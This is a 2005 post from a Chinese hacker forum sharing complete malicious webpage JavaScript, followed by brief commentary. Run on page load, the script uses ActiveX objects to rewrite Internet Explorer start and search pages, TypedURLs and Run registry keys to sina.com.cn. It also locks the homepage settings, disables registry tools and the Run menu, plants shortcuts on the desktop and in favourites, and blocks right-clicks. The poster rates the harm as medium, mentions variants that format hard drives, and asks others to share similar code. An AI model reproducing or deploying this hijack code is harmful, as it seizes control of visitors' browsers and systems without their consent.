首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册

正在浏览:   1 名游客





恶意网站jave代码(小心使用,后果自负)
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 4
等级: 1; EXP: 21
HP : 0 / 5
MP : 1 / 794
离线
<SCRIPT language=JavaScript>
<!--
var exit=true;
function junkexit() { if (exit)
open("http://www.sina.com.cn","new_window"); }
//-->
</SCRIPT>
<SCRIPT language=JavaScript>
function click(e) { if (document.all) { if (event.button==2||event.button==3) { oncontextmenu='return false'; } } if (document.layers) { if (e.which == 3) { oncontextmenu='return false'; } } } if (document.layers) { document.captureEvents(Event.MOUSEDOWN); } document.onmousedown=click; document.oncontextmenu = new Function("return false;")
</SCRIPT>

<SCRIPT language="">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try{
//if (document.cookie.indexOf("ChgLive") == -1)
//{
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL", "http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page", "http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", "http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL", "http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://www.sina.com.cn/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Page", "http://www.sina.com.cn");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage", "1");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecChangeSettings", "1");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\LinksFolderName", "我的新浪 http://www.sina.com.cn");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization", "http://www.sina.com.cn");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner", "http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");
Shl.RegWrite ("HKEY_CLASSES_ROOT\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\", "Internet 连接向导");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url5","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url6","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url7","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url8","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url9","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url10","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url11","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url12","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url13","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url14","http://www.sina.com.cn");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url15","http://www.sina.com.cn");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end set home page
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
// end set IE Window Title
//add favorites this is the common part; should be here if you want to add favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
//end common part
//the following line is used for adding favorites.
//to add multiple favorites, duplicate the following line, changing the last 2 paramaters.
AddFavLnk(loc, "修复浏览器", "http://www.sina.com.cn");
AddFavLnk(loc+"\\链接", "我的新浪", "http://www.sina.com.cn");
AddFavLnk(loc+"\\媒体", "我的新浪", "http://www.sina.com.cn");
AddFavLnk(loc+"\\频道", "我的新浪", "http://www.sina.com.cn");
AddFavLnk("C:\\WINDOWS\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch", "我的新浪", "http://www.sina.com.cn");
AddFavLnk("C:\\WINDOWS\\start menu\\", "Internet Explorer 浏览器", "http://www.sina.com.cn");
AddFavLnk("C:\\windows\\Desktop", "我的新浪", "http://www.sina.com.cn");
AddFavLnk("C:\\WINDOWS\\Start Menu\\Programs\\", "我的新浪", "http://www.sina.com.cn");
//}
}
catch(e){ }
}
catch(e){ }
}
function init(){
setTimeout("f()", 1000);
}
init();
</SCRIPT>
</FONT></FONT></B></FONT></FONT></B></FONT>
<SCRIPT language=JavaScript>
function click(e) { if (document.all) { if (event.button==2||event.button==3) { oncontextmenu='return false'; } } if (document.layers) { if (e.which == 3) { oncontextmenu='return false'; } } } if (document.layers) { document.captureEvents(Event.MOUSEDOWN); } document.onmousedown=click; document.oncontextmenu = new Function("return false;")
</SCRIPT>
从这段代码中不难看出,不但和一般的恶意代码有着相同的特点,即:使你的浏览器中的“使用空白页、默认页、当前页”的按钮将其禁止,还增加在桌面上添加快捷方式,打开后自动连接sina。在“开始”菜单中删除了“运行”选项,并在“修复浏览器”一项中也给改成了sina连接,我认为这代码和一般的代码有着不一样的地方就是“在启动windwos”时会自动启动IE浏览器,这也是相当高明的地方。
我觉得这段代码的危害程度应该是中。有的网站它不但更改你的IE,它有时候还会添加格式化硬盘的代码(当然除非添加这个代码的网站不想吸引点击率),我知道网络上的高人很多,也希望大侠们也发点这样的贴字

2005/9/26 5:29
_________________
[url=http://www.xuan
应用扩展 工具箱






可以查看帖子.
不可发帖.
不可回复.
不可编辑自己的帖子.
不可删除自己的帖子.
不可发起投票调查.
不可在投票调查中投票.
不可上传附件.
不可不经审核直接发帖.

[高级搜索]



系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号